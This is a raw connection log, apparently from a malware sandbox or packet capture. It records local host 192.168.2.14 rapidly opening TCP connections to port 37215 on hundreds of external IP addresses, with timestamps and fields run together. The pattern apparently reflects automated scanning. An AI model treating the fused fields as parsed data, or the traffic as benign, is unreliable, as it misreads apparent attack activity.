                                                        Jun 13, 2024 21:32:03.274451017 CEST5514437215192.168.2.14156.38.21.80
                                                        Jun 13, 2024 21:32:03.274452925 CEST372154432241.49.50.178192.168.2.14
                                                        Jun 13, 2024 21:32:03.274463892 CEST3721547686197.248.245.187192.168.2.14
                                                        Jun 13, 2024 21:32:03.274472952 CEST3721542156156.107.211.96192.168.2.14
                                                        Jun 13, 2024 21:32:03.274475098 CEST5891637215192.168.2.14156.40.255.202
                                                        Jun 13, 2024 21:32:03.274482965 CEST3721545212156.98.126.146192.168.2.14
                                                        Jun 13, 2024 21:32:03.274491072 CEST4768637215192.168.2.14197.248.245.187
                                                        Jun 13, 2024 21:32:03.274492979 CEST3721536906156.184.236.36192.168.2.14
                                                        Jun 13, 2024 21:32:03.274502993 CEST372153432441.177.114.51192.168.2.14
                                                        Jun 13, 2024 21:32:03.274503946 CEST4432237215192.168.2.1441.49.50.178
                                                        Jun 13, 2024 21:32:03.274503946 CEST4215637215192.168.2.14156.107.211.96
                                                        Jun 13, 2024 21:32:03.274507999 CEST4521237215192.168.2.14156.98.126.146
                                                        Jun 13, 2024 21:32:03.274513006 CEST3721550684197.11.150.37192.168.2.14
                                                        Jun 13, 2024 21:32:03.274523020 CEST3721560154197.98.113.18192.168.2.14
                                                        Jun 13, 2024 21:32:03.274527073 CEST3690637215192.168.2.14156.184.236.36
                                                        Jun 13, 2024 21:32:03.274533987 CEST3721559202156.73.112.15192.168.2.14
                                                        Jun 13, 2024 21:32:03.274544001 CEST372155261041.228.70.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.274544001 CEST3432437215192.168.2.1441.177.114.51
                                                        Jun 13, 2024 21:32:03.274544001 CEST5068437215192.168.2.14197.11.150.37
                                                        Jun 13, 2024 21:32:03.274554968 CEST3721555780156.52.1.101192.168.2.14
                                                        Jun 13, 2024 21:32:03.274565935 CEST3721540000197.146.168.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.274566889 CEST6015437215192.168.2.14197.98.113.18
                                                        Jun 13, 2024 21:32:03.274568081 CEST5920237215192.168.2.14156.73.112.15
                                                        Jun 13, 2024 21:32:03.274574995 CEST3721534586197.212.212.239192.168.2.14
                                                        Jun 13, 2024 21:32:03.274584055 CEST5261037215192.168.2.1441.228.70.82
                                                        Jun 13, 2024 21:32:03.274585009 CEST3721538432197.35.140.134192.168.2.14
                                                        Jun 13, 2024 21:32:03.274585962 CEST5578037215192.168.2.14156.52.1.101
                                                        Jun 13, 2024 21:32:03.274590015 CEST4000037215192.168.2.14197.146.168.47
                                                        Jun 13, 2024 21:32:03.274602890 CEST3458637215192.168.2.14197.212.212.239
                                                        Jun 13, 2024 21:32:03.274621964 CEST3843237215192.168.2.14197.35.140.134
                                                        Jun 13, 2024 21:32:03.274651051 CEST4033437215192.168.2.1441.130.177.177
                                                        Jun 13, 2024 21:32:03.274651051 CEST4033437215192.168.2.1441.130.177.177
                                                        Jun 13, 2024 21:32:03.274662018 CEST4059037215192.168.2.1441.130.177.177
                                                        Jun 13, 2024 21:32:03.274692059 CEST5150437215192.168.2.14197.233.249.101
                                                        Jun 13, 2024 21:32:03.274692059 CEST5150437215192.168.2.14197.233.249.101
                                                        Jun 13, 2024 21:32:03.274694920 CEST5176037215192.168.2.14197.233.249.101
                                                        Jun 13, 2024 21:32:03.274719000 CEST5998237215192.168.2.14156.81.45.147
                                                        Jun 13, 2024 21:32:03.274729013 CEST5998237215192.168.2.14156.81.45.147
                                                        Jun 13, 2024 21:32:03.274749994 CEST6023837215192.168.2.14156.81.45.147
                                                        Jun 13, 2024 21:32:03.274761915 CEST4951637215192.168.2.14197.9.246.39
                                                        Jun 13, 2024 21:32:03.274769068 CEST4951637215192.168.2.14197.9.246.39
                                                        Jun 13, 2024 21:32:03.274786949 CEST4977237215192.168.2.14197.9.246.39
                                                        Jun 13, 2024 21:32:03.274815083 CEST3614237215192.168.2.14156.98.217.11
                                                        Jun 13, 2024 21:32:03.274815083 CEST3614237215192.168.2.14156.98.217.11
                                                        Jun 13, 2024 21:32:03.274828911 CEST3721543654197.194.155.30192.168.2.14
                                                        Jun 13, 2024 21:32:03.274830103 CEST3639837215192.168.2.14156.98.217.11
                                                        Jun 13, 2024 21:32:03.274838924 CEST372155902241.208.140.157192.168.2.14
                                                        Jun 13, 2024 21:32:03.274847031 CEST5678437215192.168.2.14156.120.5.105
                                                        Jun 13, 2024 21:32:03.274847031 CEST5678437215192.168.2.14156.120.5.105
                                                        Jun 13, 2024 21:32:03.274849892 CEST372156028241.116.69.21192.168.2.14
                                                        Jun 13, 2024 21:32:03.274863005 CEST372153390041.38.56.45192.168.2.14
                                                        Jun 13, 2024 21:32:03.274873018 CEST3721541316156.178.110.31192.168.2.14
                                                        Jun 13, 2024 21:32:03.274880886 CEST4365437215192.168.2.14197.194.155.30
                                                        Jun 13, 2024 21:32:03.274880886 CEST5902237215192.168.2.1441.208.140.157
                                                        Jun 13, 2024 21:32:03.274880886 CEST6028237215192.168.2.1441.116.69.21
                                                        Jun 13, 2024 21:32:03.274892092 CEST3721554130197.205.249.150192.168.2.14
                                                        Jun 13, 2024 21:32:03.274900913 CEST3721539440156.36.62.71192.168.2.14
                                                        Jun 13, 2024 21:32:03.274910927 CEST3390037215192.168.2.1441.38.56.45
                                                        Jun 13, 2024 21:32:03.274912119 CEST3721536008197.39.167.206192.168.2.14
                                                        Jun 13, 2024 21:32:03.274910927 CEST4131637215192.168.2.14156.178.110.31
                                                        Jun 13, 2024 21:32:03.274921894 CEST3721538380197.211.1.204192.168.2.14
                                                        Jun 13, 2024 21:32:03.274930000 CEST5413037215192.168.2.14197.205.249.150
                                                        Jun 13, 2024 21:32:03.274939060 CEST3944037215192.168.2.14156.36.62.71
                                                        Jun 13, 2024 21:32:03.274941921 CEST3721548262156.85.29.213192.168.2.14
                                                        Jun 13, 2024 21:32:03.274945021 CEST3600837215192.168.2.14197.39.167.206
                                                        Jun 13, 2024 21:32:03.274952888 CEST3721557660197.207.174.181192.168.2.14
                                                        Jun 13, 2024 21:32:03.274957895 CEST5704037215192.168.2.14156.120.5.105
                                                        Jun 13, 2024 21:32:03.274962902 CEST3721535978156.217.252.15192.168.2.14
                                                        Jun 13, 2024 21:32:03.274966955 CEST3838037215192.168.2.14197.211.1.204
                                                        Jun 13, 2024 21:32:03.274974108 CEST3721554624156.22.15.149192.168.2.14
                                                        Jun 13, 2024 21:32:03.274975061 CEST4826237215192.168.2.14156.85.29.213
                                                        Jun 13, 2024 21:32:03.274982929 CEST4217837215192.168.2.14156.143.125.114
                                                        Jun 13, 2024 21:32:03.274982929 CEST372155073041.46.40.162192.168.2.14
                                                        Jun 13, 2024 21:32:03.274986982 CEST5766037215192.168.2.14197.207.174.181
                                                        Jun 13, 2024 21:32:03.274992943 CEST3721551406197.100.45.9192.168.2.14
                                                        Jun 13, 2024 21:32:03.274993896 CEST3597837215192.168.2.14156.217.252.15
                                                        Jun 13, 2024 21:32:03.275002956 CEST5462437215192.168.2.14156.22.15.149
                                                        Jun 13, 2024 21:32:03.275006056 CEST3721553476156.170.35.32192.168.2.14
                                                        Jun 13, 2024 21:32:03.275007963 CEST4217837215192.168.2.14156.143.125.114
                                                        Jun 13, 2024 21:32:03.275007963 CEST5073037215192.168.2.1441.46.40.162
                                                        Jun 13, 2024 21:32:03.275016069 CEST3721555452156.71.135.100192.168.2.14
                                                        Jun 13, 2024 21:32:03.275027037 CEST3721550682156.66.84.142192.168.2.14
                                                        Jun 13, 2024 21:32:03.275043964 CEST5347637215192.168.2.14156.170.35.32
                                                        Jun 13, 2024 21:32:03.275043964 CEST5140637215192.168.2.14197.100.45.9
                                                        Jun 13, 2024 21:32:03.275044918 CEST5545237215192.168.2.14156.71.135.100
                                                        Jun 13, 2024 21:32:03.275047064 CEST372154114041.222.216.67192.168.2.14
                                                        Jun 13, 2024 21:32:03.275055885 CEST372154404841.222.186.62192.168.2.14
                                                        Jun 13, 2024 21:32:03.275064945 CEST3721547926197.69.68.79192.168.2.14
                                                        Jun 13, 2024 21:32:03.275068998 CEST5068237215192.168.2.14156.66.84.142
                                                        Jun 13, 2024 21:32:03.275073051 CEST4114037215192.168.2.1441.222.216.67
                                                        Jun 13, 2024 21:32:03.275074959 CEST3721535390197.21.174.146192.168.2.14
                                                        Jun 13, 2024 21:32:03.275080919 CEST4404837215192.168.2.1441.222.186.62
                                                        Jun 13, 2024 21:32:03.275090933 CEST372154187041.153.95.121192.168.2.14
                                                        Jun 13, 2024 21:32:03.275100946 CEST372153638041.243.166.99192.168.2.14
                                                        Jun 13, 2024 21:32:03.275105953 CEST4792637215192.168.2.14197.69.68.79
                                                        Jun 13, 2024 21:32:03.275110006 CEST3539037215192.168.2.14197.21.174.146
                                                        Jun 13, 2024 21:32:03.275110960 CEST3721544504197.110.122.85192.168.2.14
                                                        Jun 13, 2024 21:32:03.275119066 CEST4187037215192.168.2.1441.153.95.121
                                                        Jun 13, 2024 21:32:03.275126934 CEST3638037215192.168.2.1441.243.166.99
                                                        Jun 13, 2024 21:32:03.275126934 CEST4243437215192.168.2.14156.143.125.114
                                                        Jun 13, 2024 21:32:03.275130033 CEST3721537928197.183.92.21192.168.2.14
                                                        Jun 13, 2024 21:32:03.275136948 CEST5891437215192.168.2.1441.165.251.84
                                                        Jun 13, 2024 21:32:03.275146008 CEST4450437215192.168.2.14197.110.122.85
                                                        Jun 13, 2024 21:32:03.275150061 CEST5891437215192.168.2.1441.165.251.84
                                                        Jun 13, 2024 21:32:03.275163889 CEST3792837215192.168.2.14197.183.92.21
                                                        Jun 13, 2024 21:32:03.275182962 CEST5917037215192.168.2.1441.165.251.84
                                                        Jun 13, 2024 21:32:03.275208950 CEST3463037215192.168.2.14197.125.218.39
                                                        Jun 13, 2024 21:32:03.275208950 CEST3463037215192.168.2.14197.125.218.39
                                                        Jun 13, 2024 21:32:03.275217056 CEST3488637215192.168.2.14197.125.218.39
                                                        Jun 13, 2024 21:32:03.275257111 CEST5530237215192.168.2.14156.153.254.119
                                                        Jun 13, 2024 21:32:03.275257111 CEST5530237215192.168.2.14156.153.254.119
                                                        Jun 13, 2024 21:32:03.275269985 CEST5555837215192.168.2.14156.153.254.119
                                                        Jun 13, 2024 21:32:03.275291920 CEST4318437215192.168.2.14197.126.217.241
                                                        Jun 13, 2024 21:32:03.275291920 CEST4318437215192.168.2.14197.126.217.241
                                                        Jun 13, 2024 21:32:03.275304079 CEST3721536802156.104.85.254192.168.2.14
                                                        Jun 13, 2024 21:32:03.275315046 CEST4344037215192.168.2.14197.126.217.241
                                                        Jun 13, 2024 21:32:03.275316000 CEST3721559982197.40.126.172192.168.2.14
                                                        Jun 13, 2024 21:32:03.275340080 CEST3721560654156.67.134.124192.168.2.14
                                                        Jun 13, 2024 21:32:03.275342941 CEST3680237215192.168.2.14156.104.85.254
                                                        Jun 13, 2024 21:32:03.275342941 CEST3941237215192.168.2.1441.73.171.212
                                                        Jun 13, 2024 21:32:03.275351048 CEST5998237215192.168.2.14197.40.126.172
                                                        Jun 13, 2024 21:32:03.275357962 CEST3721555208156.134.246.13192.168.2.14
                                                        Jun 13, 2024 21:32:03.275367022 CEST372155129241.3.16.29192.168.2.14
                                                        Jun 13, 2024 21:32:03.275374889 CEST6065437215192.168.2.14156.67.134.124
                                                        Jun 13, 2024 21:32:03.275376081 CEST372154408041.76.31.108192.168.2.14
                                                        Jun 13, 2024 21:32:03.275379896 CEST3941237215192.168.2.1441.73.171.212
                                                        Jun 13, 2024 21:32:03.275386095 CEST3721560560197.93.242.33192.168.2.14
                                                        Jun 13, 2024 21:32:03.275394917 CEST3721539998156.224.187.4192.168.2.14
                                                        Jun 13, 2024 21:32:03.275403976 CEST3721549734197.158.144.70192.168.2.14
                                                        Jun 13, 2024 21:32:03.275404930 CEST4408037215192.168.2.1441.76.31.108
                                                        Jun 13, 2024 21:32:03.275405884 CEST5520837215192.168.2.14156.134.246.13
                                                        Jun 13, 2024 21:32:03.275405884 CEST5129237215192.168.2.1441.3.16.29
                                                        Jun 13, 2024 21:32:03.275415897 CEST372154562241.117.110.130192.168.2.14
                                                        Jun 13, 2024 21:32:03.275425911 CEST3966837215192.168.2.1441.73.171.212
                                                        Jun 13, 2024 21:32:03.275432110 CEST6056037215192.168.2.14197.93.242.33
                                                        Jun 13, 2024 21:32:03.275433064 CEST3999837215192.168.2.14156.224.187.4
                                                        Jun 13, 2024 21:32:03.275437117 CEST4973437215192.168.2.14197.158.144.70
                                                        Jun 13, 2024 21:32:03.275449991 CEST4562237215192.168.2.1441.117.110.130
                                                        Jun 13, 2024 21:32:03.275469065 CEST4660837215192.168.2.14156.175.107.161
                                                        Jun 13, 2024 21:32:03.275469065 CEST4660837215192.168.2.14156.175.107.161
                                                        Jun 13, 2024 21:32:03.275497913 CEST4686437215192.168.2.14156.175.107.161
                                                        Jun 13, 2024 21:32:03.275512934 CEST3516437215192.168.2.14197.144.49.247
                                                        Jun 13, 2024 21:32:03.275512934 CEST3516437215192.168.2.14197.144.49.247
                                                        Jun 13, 2024 21:32:03.275535107 CEST3542037215192.168.2.14197.144.49.247
                                                        Jun 13, 2024 21:32:03.275546074 CEST4742237215192.168.2.14197.44.145.47
                                                        Jun 13, 2024 21:32:03.275559902 CEST4742237215192.168.2.14197.44.145.47
                                                        Jun 13, 2024 21:32:03.275573015 CEST4767837215192.168.2.14197.44.145.47
                                                        Jun 13, 2024 21:32:03.275597095 CEST4855237215192.168.2.14156.157.250.81
                                                        Jun 13, 2024 21:32:03.275597095 CEST4855237215192.168.2.14156.157.250.81
                                                        Jun 13, 2024 21:32:03.275624037 CEST4880837215192.168.2.14156.157.250.81
                                                        Jun 13, 2024 21:32:03.275650978 CEST3868237215192.168.2.1441.97.40.48
                                                        Jun 13, 2024 21:32:03.275650978 CEST3868237215192.168.2.1441.97.40.48
                                                        Jun 13, 2024 21:32:03.275655985 CEST3893837215192.168.2.1441.97.40.48
                                                        Jun 13, 2024 21:32:03.275676966 CEST5787437215192.168.2.14197.41.203.209
                                                        Jun 13, 2024 21:32:03.275684118 CEST5787437215192.168.2.14197.41.203.209
                                                        Jun 13, 2024 21:32:03.275710106 CEST5813037215192.168.2.14197.41.203.209
                                                        Jun 13, 2024 21:32:03.275738955 CEST5977637215192.168.2.1441.4.72.60
                                                        Jun 13, 2024 21:32:03.275738955 CEST5977637215192.168.2.1441.4.72.60
                                                        Jun 13, 2024 21:32:03.275748968 CEST6003237215192.168.2.1441.4.72.60
                                                        Jun 13, 2024 21:32:03.275770903 CEST5316437215192.168.2.14156.148.90.191
                                                        Jun 13, 2024 21:32:03.275784969 CEST5316437215192.168.2.14156.148.90.191
                                                        Jun 13, 2024 21:32:03.275804043 CEST5342037215192.168.2.14156.148.90.191
                                                        Jun 13, 2024 21:32:03.275821924 CEST4872237215192.168.2.14197.138.1.242
                                                        Jun 13, 2024 21:32:03.275832891 CEST4872237215192.168.2.14197.138.1.242
                                                        Jun 13, 2024 21:32:03.275856018 CEST4897837215192.168.2.14197.138.1.242
                                                        Jun 13, 2024 21:32:03.275873899 CEST5953437215192.168.2.1441.226.180.166
                                                        Jun 13, 2024 21:32:03.275881052 CEST5953437215192.168.2.1441.226.180.166
                                                        Jun 13, 2024 21:32:03.275911093 CEST5979037215192.168.2.1441.226.180.166
                                                        Jun 13, 2024 21:32:03.275917053 CEST4727837215192.168.2.1441.8.89.25
                                                        Jun 13, 2024 21:32:03.275928020 CEST4727837215192.168.2.1441.8.89.25
                                                        Jun 13, 2024 21:32:03.275944948 CEST4753437215192.168.2.1441.8.89.25
                                                        Jun 13, 2024 21:32:03.275971889 CEST5961437215192.168.2.14156.105.185.32
                                                        Jun 13, 2024 21:32:03.275971889 CEST5961437215192.168.2.14156.105.185.32
                                                        Jun 13, 2024 21:32:03.275983095 CEST5987037215192.168.2.14156.105.185.32
                                                        Jun 13, 2024 21:32:03.276000023 CEST5844437215192.168.2.14156.91.16.222
                                                        Jun 13, 2024 21:32:03.276000023 CEST5844437215192.168.2.14156.91.16.222
                                                        Jun 13, 2024 21:32:03.276030064 CEST5870037215192.168.2.14156.91.16.222
                                                        Jun 13, 2024 21:32:03.276042938 CEST5015837215192.168.2.14197.86.69.163
                                                        Jun 13, 2024 21:32:03.276051044 CEST5015837215192.168.2.14197.86.69.163
                                                        Jun 13, 2024 21:32:03.276074886 CEST5041437215192.168.2.14197.86.69.163
                                                        Jun 13, 2024 21:32:03.276088953 CEST4163437215192.168.2.1441.221.110.141
                                                        Jun 13, 2024 21:32:03.276097059 CEST4163437215192.168.2.1441.221.110.141
                                                        Jun 13, 2024 21:32:03.276118994 CEST4189037215192.168.2.1441.221.110.141
                                                        Jun 13, 2024 21:32:03.276139975 CEST3759637215192.168.2.1441.28.77.14
                                                        Jun 13, 2024 21:32:03.276139975 CEST3759637215192.168.2.1441.28.77.14
                                                        Jun 13, 2024 21:32:03.276170969 CEST3785237215192.168.2.1441.28.77.14
                                                        Jun 13, 2024 21:32:03.276190042 CEST3940637215192.168.2.14197.17.79.167
                                                        Jun 13, 2024 21:32:03.276190042 CEST3940637215192.168.2.14197.17.79.167
                                                        Jun 13, 2024 21:32:03.276217937 CEST3966237215192.168.2.14197.17.79.167
                                                        Jun 13, 2024 21:32:03.276232004 CEST4882237215192.168.2.14197.174.171.58
                                                        Jun 13, 2024 21:32:03.276252031 CEST4882237215192.168.2.14197.174.171.58
                                                        Jun 13, 2024 21:32:03.276266098 CEST4907837215192.168.2.14197.174.171.58
                                                        Jun 13, 2024 21:32:03.276292086 CEST4328437215192.168.2.14197.160.148.203
                                                        Jun 13, 2024 21:32:03.276292086 CEST4328437215192.168.2.14197.160.148.203
                                                        Jun 13, 2024 21:32:03.276307106 CEST4354037215192.168.2.14197.160.148.203
                                                        Jun 13, 2024 21:32:03.276329041 CEST4138237215192.168.2.14156.46.54.126
                                                        Jun 13, 2024 21:32:03.276355028 CEST4138237215192.168.2.14156.46.54.126
                                                        Jun 13, 2024 21:32:03.276356936 CEST4163837215192.168.2.14156.46.54.126
                                                        Jun 13, 2024 21:32:03.276375055 CEST3380437215192.168.2.14156.236.184.245
                                                        Jun 13, 2024 21:32:03.276386023 CEST3380437215192.168.2.14156.236.184.245
                                                        Jun 13, 2024 21:32:03.276406050 CEST3406037215192.168.2.14156.236.184.245
                                                        Jun 13, 2024 21:32:03.276437998 CEST5434637215192.168.2.14197.185.19.212
                                                        Jun 13, 2024 21:32:03.276437998 CEST5434637215192.168.2.14197.185.19.212
                                                        Jun 13, 2024 21:32:03.276453018 CEST5460237215192.168.2.14197.185.19.212
                                                        Jun 13, 2024 21:32:03.276460886 CEST4034437215192.168.2.1441.31.232.127
                                                        Jun 13, 2024 21:32:03.276474953 CEST4034437215192.168.2.1441.31.232.127
                                                        Jun 13, 2024 21:32:03.276493073 CEST4060037215192.168.2.1441.31.232.127
                                                        Jun 13, 2024 21:32:03.276503086 CEST4803037215192.168.2.14156.53.92.173
                                                        Jun 13, 2024 21:32:03.276515961 CEST4803037215192.168.2.14156.53.92.173
                                                        Jun 13, 2024 21:32:03.276544094 CEST4828637215192.168.2.14156.53.92.173
                                                        Jun 13, 2024 21:32:03.276556969 CEST3381037215192.168.2.1441.112.63.221
                                                        Jun 13, 2024 21:32:03.276556969 CEST3381037215192.168.2.1441.112.63.221
                                                        Jun 13, 2024 21:32:03.276575089 CEST3406637215192.168.2.1441.112.63.221
                                                        Jun 13, 2024 21:32:03.276593924 CEST4654837215192.168.2.1441.30.149.64
                                                        Jun 13, 2024 21:32:03.276593924 CEST4654837215192.168.2.1441.30.149.64
                                                        Jun 13, 2024 21:32:03.276612043 CEST4680437215192.168.2.1441.30.149.64
                                                        Jun 13, 2024 21:32:03.276628017 CEST5808837215192.168.2.1441.120.240.25
                                                        Jun 13, 2024 21:32:03.276637077 CEST5808837215192.168.2.1441.120.240.25
                                                        Jun 13, 2024 21:32:03.276663065 CEST5834437215192.168.2.1441.120.240.25
                                                        Jun 13, 2024 21:32:03.276684046 CEST5561837215192.168.2.14197.212.192.227
                                                        Jun 13, 2024 21:32:03.276698112 CEST5561837215192.168.2.14197.212.192.227
                                                        Jun 13, 2024 21:32:03.276719093 CEST5587437215192.168.2.14197.212.192.227
                                                        Jun 13, 2024 21:32:03.276748896 CEST6087437215192.168.2.14156.145.120.237
                                                        Jun 13, 2024 21:32:03.276748896 CEST6087437215192.168.2.14156.145.120.237
                                                        Jun 13, 2024 21:32:03.276762009 CEST3289837215192.168.2.14156.145.120.237
                                                        Jun 13, 2024 21:32:03.276778936 CEST3372637215192.168.2.14156.109.239.35
                                                        Jun 13, 2024 21:32:03.276794910 CEST3372637215192.168.2.14156.109.239.35
                                                        Jun 13, 2024 21:32:03.276818037 CEST3398237215192.168.2.14156.109.239.35
                                                        Jun 13, 2024 21:32:03.276833057 CEST4551437215192.168.2.14197.235.36.247
                                                        Jun 13, 2024 21:32:03.276842117 CEST4551437215192.168.2.14197.235.36.247
                                                        Jun 13, 2024 21:32:03.276854992 CEST4577037215192.168.2.14197.235.36.247
                                                        Jun 13, 2024 21:32:03.276870966 CEST5245837215192.168.2.14156.150.6.110
                                                        Jun 13, 2024 21:32:03.276880980 CEST5245837215192.168.2.14156.150.6.110
                                                        Jun 13, 2024 21:32:03.276895046 CEST5271437215192.168.2.14156.150.6.110
                                                        Jun 13, 2024 21:32:03.276925087 CEST6091237215192.168.2.14156.200.130.213
                                                        Jun 13, 2024 21:32:03.276925087 CEST6091237215192.168.2.14156.200.130.213
                                                        Jun 13, 2024 21:32:03.276946068 CEST3293637215192.168.2.14156.200.130.213
                                                        Jun 13, 2024 21:32:03.276963949 CEST4269637215192.168.2.14156.85.224.246
                                                        Jun 13, 2024 21:32:03.276963949 CEST4269637215192.168.2.14156.85.224.246
                                                        Jun 13, 2024 21:32:03.277004957 CEST4295237215192.168.2.14156.85.224.246
                                                        Jun 13, 2024 21:32:03.277008057 CEST5944637215192.168.2.14197.136.2.96
                                                        Jun 13, 2024 21:32:03.277008057 CEST5944637215192.168.2.14197.136.2.96
                                                        Jun 13, 2024 21:32:03.277028084 CEST5970237215192.168.2.14197.136.2.96
                                                        Jun 13, 2024 21:32:03.277043104 CEST5299837215192.168.2.14156.224.73.220
                                                        Jun 13, 2024 21:32:03.277050972 CEST5299837215192.168.2.14156.224.73.220
                                                        Jun 13, 2024 21:32:03.277065039 CEST5325437215192.168.2.14156.224.73.220
                                                        Jun 13, 2024 21:32:03.277085066 CEST4107037215192.168.2.1441.34.96.28
                                                        Jun 13, 2024 21:32:03.277086020 CEST4107037215192.168.2.1441.34.96.28
                                                        Jun 13, 2024 21:32:03.277107954 CEST4132637215192.168.2.1441.34.96.28
                                                        Jun 13, 2024 21:32:03.277127028 CEST5923237215192.168.2.14156.51.40.232
                                                        Jun 13, 2024 21:32:03.277127028 CEST5923237215192.168.2.14156.51.40.232
                                                        Jun 13, 2024 21:32:03.277164936 CEST5948837215192.168.2.14156.51.40.232
                                                        Jun 13, 2024 21:32:03.277168989 CEST4715837215192.168.2.14197.238.194.238
                                                        Jun 13, 2024 21:32:03.277193069 CEST4715837215192.168.2.14197.238.194.238
                                                        Jun 13, 2024 21:32:03.277206898 CEST4741437215192.168.2.14197.238.194.238
                                                        Jun 13, 2024 21:32:03.277235985 CEST3594237215192.168.2.14156.75.42.168
                                                        Jun 13, 2024 21:32:03.277235985 CEST3594237215192.168.2.14156.75.42.168
                                                        Jun 13, 2024 21:32:03.277256012 CEST3619837215192.168.2.14156.75.42.168
                                                        Jun 13, 2024 21:32:03.277271032 CEST4503437215192.168.2.14197.118.96.81
                                                        Jun 13, 2024 21:32:03.277271032 CEST4503437215192.168.2.14197.118.96.81
                                                        Jun 13, 2024 21:32:03.277297974 CEST4529037215192.168.2.14197.118.96.81
                                                        Jun 13, 2024 21:32:03.277333021 CEST5318637215192.168.2.14156.135.255.113
                                                        Jun 13, 2024 21:32:03.277333021 CEST5318637215192.168.2.14156.135.255.113
                                                        Jun 13, 2024 21:32:03.277349949 CEST5344237215192.168.2.14156.135.255.113
                                                        Jun 13, 2024 21:32:03.277360916 CEST4267237215192.168.2.14156.252.194.48
                                                        Jun 13, 2024 21:32:03.277374983 CEST4267237215192.168.2.14156.252.194.48
                                                        Jun 13, 2024 21:32:03.277404070 CEST4292837215192.168.2.14156.252.194.48
                                                        Jun 13, 2024 21:32:03.277417898 CEST4970637215192.168.2.14156.15.119.11
                                                        Jun 13, 2024 21:32:03.277417898 CEST4970637215192.168.2.14156.15.119.11
                                                        Jun 13, 2024 21:32:03.277445078 CEST4996237215192.168.2.14156.15.119.11
                                                        Jun 13, 2024 21:32:03.277467012 CEST4805837215192.168.2.14156.100.103.80
                                                        Jun 13, 2024 21:32:03.277467012 CEST4805837215192.168.2.14156.100.103.80
                                                        Jun 13, 2024 21:32:03.277478933 CEST4831437215192.168.2.14156.100.103.80
                                                        Jun 13, 2024 21:32:03.277506113 CEST4091637215192.168.2.14156.38.59.86
                                                        Jun 13, 2024 21:32:03.277534008 CEST4117237215192.168.2.14156.38.59.86
                                                        Jun 13, 2024 21:32:03.277538061 CEST4091637215192.168.2.14156.38.59.86
                                                        Jun 13, 2024 21:32:03.277569056 CEST4653637215192.168.2.14156.2.71.33
                                                        Jun 13, 2024 21:32:03.277570009 CEST4628037215192.168.2.14156.2.71.33
                                                        Jun 13, 2024 21:32:03.277570009 CEST4628037215192.168.2.14156.2.71.33
                                                        Jun 13, 2024 21:32:03.277586937 CEST3397637215192.168.2.14197.163.2.0
                                                        Jun 13, 2024 21:32:03.277586937 CEST3397637215192.168.2.14197.163.2.0
                                                        Jun 13, 2024 21:32:03.277611017 CEST3423237215192.168.2.14197.163.2.0
                                                        Jun 13, 2024 21:32:03.277623892 CEST6081637215192.168.2.14197.245.198.17
                                                        Jun 13, 2024 21:32:03.277632952 CEST6081637215192.168.2.14197.245.198.17
                                                        Jun 13, 2024 21:32:03.277654886 CEST3284037215192.168.2.14197.245.198.17
                                                        Jun 13, 2024 21:32:03.277676105 CEST4114037215192.168.2.14156.13.239.178
                                                        Jun 13, 2024 21:32:03.277688026 CEST4114037215192.168.2.14156.13.239.178
                                                        Jun 13, 2024 21:32:03.277710915 CEST4139637215192.168.2.14156.13.239.178
                                                        Jun 13, 2024 21:32:03.277721882 CEST4676837215192.168.2.14197.137.20.236
                                                        Jun 13, 2024 21:32:03.277729988 CEST4676837215192.168.2.14197.137.20.236
                                                        Jun 13, 2024 21:32:03.277755976 CEST4702437215192.168.2.14197.137.20.236
                                                        Jun 13, 2024 21:32:03.277762890 CEST5287037215192.168.2.1441.142.34.29
                                                        Jun 13, 2024 21:32:03.277762890 CEST5287037215192.168.2.1441.142.34.29
                                                        Jun 13, 2024 21:32:03.277795076 CEST5312637215192.168.2.1441.142.34.29
                                                        Jun 13, 2024 21:32:03.277853966 CEST4432237215192.168.2.1441.49.50.178
                                                        Jun 13, 2024 21:32:03.277858019 CEST4457837215192.168.2.1441.49.50.178
                                                        Jun 13, 2024 21:32:03.277853966 CEST4432237215192.168.2.1441.49.50.178
                                                        Jun 13, 2024 21:32:03.277880907 CEST5891637215192.168.2.14156.40.255.202
                                                        Jun 13, 2024 21:32:03.277880907 CEST5891637215192.168.2.14156.40.255.202
                                                        Jun 13, 2024 21:32:03.277895927 CEST5917237215192.168.2.14156.40.255.202
                                                        Jun 13, 2024 21:32:03.277920008 CEST4768637215192.168.2.14197.248.245.187
                                                        Jun 13, 2024 21:32:03.277931929 CEST4768637215192.168.2.14197.248.245.187
                                                        Jun 13, 2024 21:32:03.277950048 CEST4794237215192.168.2.14197.248.245.187
                                                        Jun 13, 2024 21:32:03.277976036 CEST4215637215192.168.2.14156.107.211.96
                                                        Jun 13, 2024 21:32:03.277976036 CEST4215637215192.168.2.14156.107.211.96
                                                        Jun 13, 2024 21:32:03.277992964 CEST4241237215192.168.2.14156.107.211.96
                                                        Jun 13, 2024 21:32:03.278012991 CEST4521237215192.168.2.14156.98.126.146
                                                        Jun 13, 2024 21:32:03.278012991 CEST4521237215192.168.2.14156.98.126.146
                                                        Jun 13, 2024 21:32:03.278038025 CEST4546837215192.168.2.14156.98.126.146
                                                        Jun 13, 2024 21:32:03.278054953 CEST3690637215192.168.2.14156.184.236.36
                                                        Jun 13, 2024 21:32:03.278064013 CEST3690637215192.168.2.14156.184.236.36
                                                        Jun 13, 2024 21:32:03.278081894 CEST3716237215192.168.2.14156.184.236.36
                                                        Jun 13, 2024 21:32:03.278095007 CEST3432437215192.168.2.1441.177.114.51
                                                        Jun 13, 2024 21:32:03.278104067 CEST3432437215192.168.2.1441.177.114.51
                                                        Jun 13, 2024 21:32:03.278131962 CEST3458037215192.168.2.1441.177.114.51
                                                        Jun 13, 2024 21:32:03.278148890 CEST5068437215192.168.2.14197.11.150.37
                                                        Jun 13, 2024 21:32:03.278148890 CEST5068437215192.168.2.14197.11.150.37
                                                        Jun 13, 2024 21:32:03.278171062 CEST5094037215192.168.2.14197.11.150.37
                                                        Jun 13, 2024 21:32:03.278199911 CEST6015437215192.168.2.14197.98.113.18
                                                        Jun 13, 2024 21:32:03.278199911 CEST6015437215192.168.2.14197.98.113.18
                                                        Jun 13, 2024 21:32:03.278212070 CEST6041037215192.168.2.14197.98.113.18
                                                        Jun 13, 2024 21:32:03.278237104 CEST5920237215192.168.2.14156.73.112.15
                                                        Jun 13, 2024 21:32:03.278237104 CEST5920237215192.168.2.14156.73.112.15
                                                        Jun 13, 2024 21:32:03.278264046 CEST5945637215192.168.2.14156.73.112.15
                                                        Jun 13, 2024 21:32:03.278337002 CEST5261037215192.168.2.1441.228.70.82
                                                        Jun 13, 2024 21:32:03.278337002 CEST5261037215192.168.2.1441.228.70.82
